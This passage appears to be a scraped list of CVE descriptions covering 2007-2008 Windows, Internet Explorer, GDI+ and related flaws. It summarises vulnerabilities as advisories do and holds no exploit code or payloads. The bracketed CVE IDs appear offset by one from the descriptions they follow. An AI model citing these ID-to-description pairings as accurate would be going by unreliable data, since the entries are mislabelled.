Bluetooth connection to a peer with a long name, which allows remote attackers to cause a denial of service (device reboot) by configuring a Bluetooth device with a long hci name and (1) connecting directly to the Windows Mobile system or (2) waiting for the Windows Mobile system to scan for nearby devices. [CVE-2008-4269] The search-ms protocol handler in Windows Explorer in Microsoft Windows Vista Gold and SP1 and Server 2008 uses untrusted parameter data obtained from incorrect parsing, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Windows Search Parsing Vulnerability." [CVE-2008-4268] The Windows Search component in Microsoft Windows Vista Gold and SP1 and Server 2008 does not properly free memory during a save operation for a Windows Search file, which allows remote attackers to execute arbitrary code via a crafted saved-search file, aka "Windows Saved Search Vulnerability." [CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-4255] Heap-based buffer overflow in mscomct2.ocx (aka Windows Common ActiveX control or Microsoft Animation ActiveX control) in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, and Office Project 2003 SP3 and 2007 Gold and SP1 allows remote attackers to execute arbitrary code via an AVI file with a crafted stream length, which triggers an "allocation error" and memory corruption, aka "Windows Common AVI Parsing Overflow Vulnerability." [CVE-2008-4250] The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability." [CVE-2008-4127] Mshtml.dll in Microsoft Internet Explorer 7 Gold 7.0.5730 and 8 Beta 8.0.6001 on Windows XP SP2 allows remote attackers to cause a denial of service (failure of subsequent image rendering) via a crafted PNG file, related to an infinite loop in the CDwnTaskExec::ThreadExec function. [CVE-2008-4114] srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability." [CVE-2008-4071] A certain ActiveX control in Adobe Acrobat 9, when used with Microsoft Windows Vista and Internet Explorer 7, allows remote attackers to cause a denial of service (browser crash) via an src property value with an invalid acroie:// URL. [CVE-2008-4038] Buffer underflow in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a Server Message Block (SMB) request that contains a filename with a crafted length, aka "SMB Buffer Underflow Vulnerability." [CVE-2008-4037] Microsoft Windows 2000 Gold through SP4, XP Gold through SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote SMB servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, as demonstrated by backrush, aka "SMB Credential Reflection Vulnerability." NOTE: some reliable sources report that this vulnerability exists because of an insufficient fix for CVE-2000-0834. [CVE-2008-4036] Integer overflow in Memory Manager in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that triggers an erroneous decrement of a variable, related to validation of parameters for Virtual Address Descriptors (VADs) and a "memory allocation mapping error," aka "Virtual Address Descriptor Elevation of Privilege Vulnerability." [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-3957] The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL in the first argument to the Open method, in conjunction with a full destination pathname in the first argument to the Save method. NOTE: the provenance of this information is unknown [CVE-2008-3893] Microsoft Bitlocker in Windows Vista before SP1 stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer during boot, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3815] Unspecified vulnerability in Cisco Adaptive Security Appliances (ASA) 5500 Series and PIX Security Appliances 7.0 before 7.0(8)3, 7.1 before 7.1(2)78, 7.2 before 7.2(4)16, 8.0 before 8.0(4)6, and 8.1 before 8.1(1)13, when configured as a VPN using Microsoft Windows NT Domain authentication, allows remote attackers to bypass VPN authentication via unknown vectors. [CVE-2008-3648] nslookup.exe in Microsoft Windows XP SP2 allows user-assisted remote attackers to execute arbitrary code, as demonstrated by an attempted DNS zone transfer, and as exploited in the wild in August 2008. [CVE-2008-3636] Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. [CVE-2008-3479] Heap-based buffer overflow in the Microsoft Message Queuing (MSMQ) service (mqsvc.exe) in Microsoft Windows 2000 SP4 allows remote attackers to read memory contents and execute arbitrary code via a crafted RPC call, related to improper processing of parameters to string APIs, aka "Message Queuing Service Remote Code Execution Vulnerability." [CVE-2008-3465] Heap-based buffer overflow in an API in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows context-dependent attackers to cause a denial of service or execute arbitrary code via a WMF file with a malformed file-size parameter, which would not be properly handled by a third-party application that uses this API for a copy operation, aka "GDI Heap Overflow Vulnerability." [CVE-2008-3464] afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP1 and SP2 does not properly validate input sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, as demonstrated using crafted pointers and lengths that bypass intended ProbeForRead and ProbeForWrite restrictions, aka "AFD Kernel Overwrite Vulnerability." [CVE-2008-3068] Microsoft Crypto API 5.131.2600.2180 through 6.0, as used in Outlook, Windows Live Mail, and Office 2007, performs Certificate Revocation List (CRL) checks by using an arbitrary URL from a certificate embedded in a (1) S/MIME e-mail message or (2) signed document, which allows remote attackers to obtain reading times and IP addresses of recipients, and port-scan results, via a crafted certificate with an Authority Information Access (AIA) extension. [CVE-2008-3014] Buffer overflow in gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory allocation, aka "GDI+ WMF Buffer Overrun Vulnerability." [CVE-2008-3013] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability." [CVE-2008-3012] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image file, aka "GDI+ EMF Memory Corruption Vulnerability." [CVE-2008-3010] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1 and 9 incorrectly associate ISATAP addresses with the Local Intranet zone, which allows remote servers to capture NTLM credentials, and execute arbitrary code through credential-reflection attacks, by sending an authentication request, aka "ISATAP Vulnerability." [CVE-2008-3009] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1, 9, and 2008 do not properly use the Service Principal Name (SPN) identifier when validating replies to authentication requests, which allows remote servers to execute arbitrary code via vectors that employ NTLM credential reflection, aka "SPN Vulnerability." [CVE-2008-3008] Stack-based buffer overflow in the WMEncProfileManager ActiveX control in wmex.dll in Microsoft Windows Media Encoder 9 Series allows remote attackers to execute arbitrary code via a long first argument to the GetDetailsString method, aka "Windows Media Encoder Buffer Overrun Vulnerability." [CVE-2008-2547] Stack-based buffer overflow in msiexec.exe 3.1.4000.1823 and 4.5.6001.22159 in Microsoft Windows Installer allows context-dependent attackers to execute arbitrary code via a long GUID value for the /x (aka /uninstall) option. NOTE: this issue might cross privilege boundaries if msiexec.exe is reachable via components such as ActiveX controls, and might additionally require a separate vulnerability in the control. [CVE-2008-2540] Apple Safari on Mac OS X, and before 3.1.2 on Windows, does not prompt the user before downloading an object that has an unrecognized content type, which allows remote attackers to place malware into the (1) Desktop directory on Windows or (2) Downloads directory on Mac OS X, and subsequently allows remote attackers to execute arbitrary code on Windows by leveraging an untrusted search path vulnerability in (a) Internet Explorer 7 on Windows XP or (b) the SearchPath function in Windows XP, Vista, and Server 2003 and 2008, aka a "Carpet Bomb" and a "Blended Threat Elevation of Privilege Vulnerability," a different issue than CVE-2008-1032. NOTE: Apple considers this a vulnerability only because the Microsoft products can load application libraries from the desktop and, as of 20080619, has not covered the issue in an advisory for Mac OS X. [CVE-2008-2253] Unspecified vulnerability in Microsoft Windows Media Player 11 allows remote attackers to execute arbitrary code via a crafted audio-only file that is streamed from a Server-Side Playlist (SSPL) on Windows Media Server, aka "Windows Media Player Sampling Rate Vulnerability." [CVE-2008-2252] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate parameters sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Corruption Vulnerability." [CVE-2008-2251] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that makes system calls within multiple threads, aka "Windows Kernel Unhandled Exception Vulnerability." NOTE: according to Microsoft, this is not a duplicate of CVE-2008-4510. [CVE-2008-2250] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate window properties sent from a parent window to a child window during creation of a new window, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Window Creation Vulnerability." [CVE-2008-2249] Integer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a malformed header in a crafted WMF file, which triggers a buffer overflow, aka "GDI Integer Overflow Vulnerability." [CVE-2008-2246] Microsoft Windows Vista through SP1 and Server 2008 do not properly import the default IPsec policy from a Windows Server 2003 domain to a Windows Server 2008 domain, which prevents IPsec rules from being enforced and allows remote attackers to bypass intended access restrictions. [CVE-2008-2245] Heap-based buffer overflow in the InternalOpenColorProfile function in mscms.dll in Microsoft Windows Image Color Management System (MSCMS) in the Image Color Management (ICM) component on Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted image file. [CVE-2008-2160] Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted (1) JPEG and (2) GIF images. [CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor. [CVE-2008-1457] The Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate per-user subscriptions, which allows remote authenticated users to execute arbitrary code via a crafted event subscription request. [CVE-2008-1456] Array index vulnerability in the Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote authenticated users to execute arbitrary code via a crafted event subscription request that is used to access an array of function pointers. [CVE-2008-1454] Unspecified vulnerability in Microsoft DNS in Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 allows remote attackers to conduct cache poisoning attacks via unknown vectors related to accepting "records from a response that is outside the remote server's authority," aka "DNS Cache Poisoning Vulnerability," a different vulnerability than CVE-2008-1447. [CVE-2008-1453] The Bluetooth stack in Microsoft Windows XP SP2 and SP3, and Vista Gold and SP1, allows physically proximate attackers to execute arbitrary code via a large series of Service Discovery Protocol (SDP) packets. [CVE-2008-1451] The WINS service on Microsoft Windows 2000 SP4, and Server 2003 SP1 and SP2, does not properly validate data structures in WINS network packets, which allows local users to gain privileges via a crafted packet, aka "Memory Overwrite Vulnerability." [CVE-2008-1448] The MHTML protocol handler in a component of Microsoft Outlook Express 5.5 SP2 and 6 through SP1, and Windows Mail, does not assign the correct Internet Explorer Security Zone to UNC share pathnames, which allows remote attackers to bypass intended access restrictions and read arbitrary files via an mhtml: URI in conjunction with a redirection, aka "URL Parsing Cross-Domain Information Disclosure Vulnerability." [CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-1444] Stack-based buffer overflow in Microsoft DirectX 7.0 and 8.1 on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a Synchronized Accessible Media Interchange (SAMI) file with crafted parameters for a Class Name variable, aka the "SAMI Format Parsing Vulnerability." [CVE-2008-1441] Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system hang) via a series of Pragmatic General Multicast (PGM) packets with invalid fragment options, aka the "PGM Malformed Fragment Vulnerability." [CVE-2008-1440] Microsoft Windows XP SP2 and SP3, and Server 2003 SP1 and SP2, does not properly validate the option length field in Pragmatic General Multicast (PGM) packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted PGM packet, aka the "PGM Invalid Length Vulnerability." [CVE-2008-1436] Microsoft Windows XP Professional SP2, Vista, and Server 2003 and 2008 does not properly assign activities to the (1) NetworkService and (2) LocalService accounts, which might allow context-dependent attackers to gain privileges by using one service process to capture a resource from a second service process that has a LocalSystem privilege-escalation ability, related to improper management of the SeImpersonatePrivilege user right, as originally reported for Internet Information Services (IIS), aka Token Kidnapping. [CVE-2008-1435] Windows Explorer in Microsoft Windows Vista up to SP1, and Server 2008, allows user-assisted remote attackers to execute arbitrary code via crafted saved-search (.search-ms) files that are not properly handled when saving, aka "Windows Saved Search Vulnerability." [CVE-2008-1087] Stack-based buffer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF image file with crafted filename parameters, aka "GDI Stack Overflow Vulnerability." [CVE-2008-1086] The HxTocCtrl ActiveX control (hxvz.dll), as used in Microsoft Internet Explorer 5.01 SP4 and 6 SP1, in Windows XP SP2, Server 2003 SP1 and SP2, Vista SP1, and Server 2008, allows remote attackers to execute arbitrary code via malformed arguments, which triggers memory corruption. [CVE-2008-1084] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys. [CVE-2008-1083] Heap-based buffer overflow in the CreateDIBPatternBrushPt function in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF or WMF image file with a malformed header that triggers an integer overflow, aka "GDI Heap Overflow Vulnerability." [CVE-2008-0951] Microsoft Windows Vista does not properly enforce the NoDriveTypeAutoRun registry value, which allows user-assisted remote attackers, and possibly physically proximate attackers, to execute arbitrary code by inserting a (1) CD-ROM device or (2) U3-enabled USB device containing a filesystem with an Autorun.inf file, and possibly other vectors related to (a) AutoRun and (b) AutoPlay actions. [CVE-2008-0322] The I2O Utility Filter driver (i2omgmt.sys) 5.1.2600.2180 for Microsoft Windows XP sets Everyone/Write permissions for the "\\.\I2OExc" device interface, which allows local users to gain privileges. NOTE: this issue can be leveraged to overwrite arbitrary memory and execute code via an IOCTL call with a crafted DeviceObject pointer. [CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2008-0087] The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, and Vista uses predictable DNS transaction IDs, which allows remote attackers to spoof DNS responses. [CVE-2008-0084] Unspecified vulnerability in the TCP/IP support in Microsoft Windows Vista allows remote DHCP servers to cause a denial of service (hang and restart) via a crafted DHCP packet. [CVE-2008-0083] The (1) VBScript (VBScript.dll) and (2) JScript (JScript.dll) scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response. [CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015. [CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability." [CVE-2007-6753] Untrusted search path vulnerability in Shell32.dll in Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2008, and Windows 7, when using an environment configured with a string such as %APPDATA% or %PROGRAMFILES% in a certain way, allows local users to gain privileges via a Trojan horse DLL under the current working directory, as demonstrated by iTunes and Safari. [CVE-2007-6401] Stack-based buffer overflow in mplayer2.exe in Microsoft Windows Media Player (WMP) 6.4, when used with the 3ivx 4.5.1 or 5.0.1 codec, allows remote attackers to execute arbitrary code via a certain .mp4 file, possibly a related issue to CVE-2007-6402. [CVE-2007-6332] The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method. [CVE-2007-6236] Microsoft Windows Media Player (WMP) allows remote attackers to cause a denial of service (application crash) via a certain AIFF file that triggers a divide-by-zero error, as demonstrated by kr.aiff. [CVE-2007-6043] The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898. [CVE-2007-5634] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, does not properly check a buffer during an IOCTL 0x9c402420 call, which allows local users to cause a denial of service (machine crash) and possibly gain privileges via unspecified vectors. [CVE-2007-5633] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, allows local users to read or write arbitrary MSRs, and gain privileges and load unsigned drivers, via the (1) IOCTL_RDMSR 0x9C402438 and (2) IOCTL_WRMSR 0x9C40243C IOCTLs to \Device\speedfan, as demonstrated by an IOCTL_WRMSR action on MSR_LSTAR. [CVE-2007-5587] Buffer overflow in Macrovision SafeDisc secdrv.sys before 4.3.86.0, as shipped in Microsoft Windows XP SP2, XP Professional x64 and x64 SP2, Server 2003 SP1 and SP2, and Server 2003 x64 and x64 SP2 allows local users to overwrite arbitrary memory locations and gain privileges via a crafted argument to a METHOD_NEITHER IOCTL, as originally discovered in the wild. [CVE-2007-5460] Microsoft ActiveSync 4.1, as used in Windows Mobile 5.0, uses weak encryption (XOR obfuscation with a fixed key) when sending the user's PIN/Password over the USB connection from the host to the device, which might make it easier for attackers to decode a PIN/Password obtained by (1) sniffing or (2) spoofing the docking process. [CVE-2007-5352] Unspecified vulnerability in Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows local users to gain privileges via a crafted local procedure call (LPC) request. [CVE-2007-5351] Unspecified vulnerability in Server Message Block Version 2 (SMBv2) signing support in Microsoft Windows Vista allows remote attackers to force signature re-computation and execute arbitrary code via a crafted SMBv2 packet, aka "SMBv2 Signing Vulnerability." [CVE-2007-5350] Unspecified vulnerability in the Windows Advanced Local Procedure Call (ALPC) in the kernel in Microsoft Windows Vista allows local users to gain privileges via unspecified vectors involving "legacy reply paths." [CVE-2007-5348] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL, aka "GDI+ VML Buffer Overrun Vulnerability." [CVE-2007-5145] Multiple buffer overflows in system DLL files in Microsoft Windows XP, as used by Microsoft Windows Explorer (explorer.exe) 6.00.2900.2180, Don Ho Notepad++, unspecified Adobe Macromedia applications, and other programs, allow user-assisted remote attackers to cause a denial of service (application crash) via long strings in the (1) author, (2) title, (3) subject, and (4) comment Properties fields of a file, possibly involving improper handling of extended file attributes by the (a) NtQueryInformationFile, (b) NtQueryDirectoryFile, (c) NtSetInformationFile, (d) FileAllInformation, (e) FileNameInformation, and other FILE_INFORMATION_CLASS functions in ntdll.dll and the (f) GetFileAttributesExW and (g) GetFileAttributesW functions in kernel32.dll, a related issue to CVE-2007-1347. [CVE-2007-5133] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service (CPU consumption) via a certain PNG file with a large tEXt chunk that possibly triggers an integer overflow in PNG chunk size handling, as demonstrated by badlycrafted.png. [CVE-2007-5095] Microsoft Windows Media Player (WMP) 9 on Windows XP SP2 invokes Internet Explorer to render HTML documents contained inside some media files, regardless of what default web browser is configured, which might allow remote attackers to exploit vulnerabilities in software that the user does not expect to run, as demonstrated by the HTMLView parameter in an .asx file. [CVE-2007-4414] Cisco VPN Client on Windows before 4.8.02.0010 allows local users to gain privileges by enabling the "Start Before Logon" (SBL) and Microsoft Dial-Up Networking options, and then interacting with the dial-up networking dialog box. [CVE-2007-4288] Microsoft Windows Media Player 11 (wmplayer.exe) allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .au file that triggers a divide-by-zero error, as demonstrated by iapetus.au. [CVE-2007-4247] Windows Calendar on Microsoft Windows Vista allows remote attackers to cause a denial of service (NULL dereference and persistent application crash) via a malformed ICS file. [CVE-2007-4227] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain JPG file, as demonstrated by something.jpg. NOTE: this issue might be related to CVE-2007-3958. [CVE-2007-3958] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain GIF file, as demonstrated by Art.gif. [CVE-2007-3898] The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors. [CVE-2007-3897] Heap-based buffer overflow in Microsoft Outlook Express 6 and earlier, and Windows Mail for Vista, allows remote Network News Transfer Protocol (NNTP) servers to execute arbitrary code via long NNTP responses that trigger memory corruption. [CVE-2007-3896] The URL handling in Shell32.dll in the Windows shell in Microsoft Windows XP and Server 2003, with Internet Explorer 7 installed, allows remote attackers to execute arbitrary programs via invalid "%" sequences in a mailto: or other URI handler, as demonstrated using mIRC, Outlook, Firefox, Adobe Reader, Skype, and other applications. NOTE: this issue might be related to other issues involving URL handlers in Windows systems, such as CVE-2007-3845. There also might be separate but closely related issues in the applications that are invoked by the handlers. [CVE-2007-3826] Microsoft Internet Explorer 7 on Windows XP SP2 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via repeated document.open function calls after a user requests a new page, but before the onBeforeUnload function is called. [CVE-2007-3724] The process scheduler in the Microsoft Windows XP kernel does not make use of the process statistics kept by the kernel, performs scheduling based on CPU billing gathered from periodic process sampling ticks, and gives preference to "interactive" processes that perform voluntary sleeps, which allows local users to cause a denial of service (CPU consumption), as described in "Secretly Monopolizing the CPU Without Superuser Privileges." [CVE-2007-3671] Unspecified vulnerability in the kernel in Microsoft Windows Vista has unspecified remote attack vectors and impact, as shown in the "0day IPO" presentation at SyScan'07. [CVE-2007-3463] DISPUTED Microsoft Windows XP SP2 allows local users, who have sessions created by another user's RunAs (run as) command, to kill arbitrary processes of this other user, as demonstrated by the taskkill program. NOTE: the researcher claims a vendor dispute in which the vendor states that "RunAs and UAC are convenience features, not security boundaries. If you need a security guarantee, please log out and log back in with a different account." [CVE-2007-3436] Microsoft MSN Messenger 4.7 on Windows XP allows remote attackers to cause a denial of service (resource consumption) via a flood of SIP INVITE requests to the port specified for voice conversation. [CVE-2007-3406] Multiple absolute path traversal vulnerabilities in Microsoft Internet Explorer 6 on Windows XP SP2 allow remote attackers to access arbitrary local files via the file: URI in the (1) src attribute of a (a) bgsound, (b) input, (c) EMBED, (d) img, or (e) script tag [CVE-2007-3300] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070619 allow remote attackers to bypass scanning via a crafted header in a (1) LHA or (2) RAR archive. [CVE-2007-3040] Stack-based buffer overflow in agentdpv.dll 2.0.0.3425 in Microsoft Agent on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a crafted URL to the Agent (Agent.Control) ActiveX control, which triggers an overflow within the Agent Service (agentsrv.exe) process, a different issue than CVE-2007-1205. [CVE-2007-3039] Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server. [CVE-2007-3038] The Teredo interface in Microsoft Windows Vista and Vista x64 Edition does not properly handle certain network traffic, which allows remote attackers to bypass firewall blocking rules and obtain sensitive information via crafted IPv6 traffic, aka "Windows Vista Firewall Blocking Rule Information Disclosure Vulnerability." [CVE-2007-3037] Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that causes a size mismatch between compressed and decompressed data and triggers a heap-based buffer overflow, aka "Windows Media Player Code Execution Vulnerability Parsing Skins." [CVE-2007-3036] Unspecified vulnerability in the (1) Windows Services for UNIX 3.0 and 3.5, and (2) Subsystem for UNIX-based Applications in Microsoft Windows 2000, XP, Server 2003, and Vista allows local users to gain privileges via unspecified vectors related to "certain setuid binary files." [CVE-2007-3035] Unspecified vulnerability in Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that is not properly handled during decompression, aka "Windows Media Player Code Execution Vulnerability Decompressing Skins." [CVE-2007-3034] Integer overflow in the AttemptWrite function in Graphics 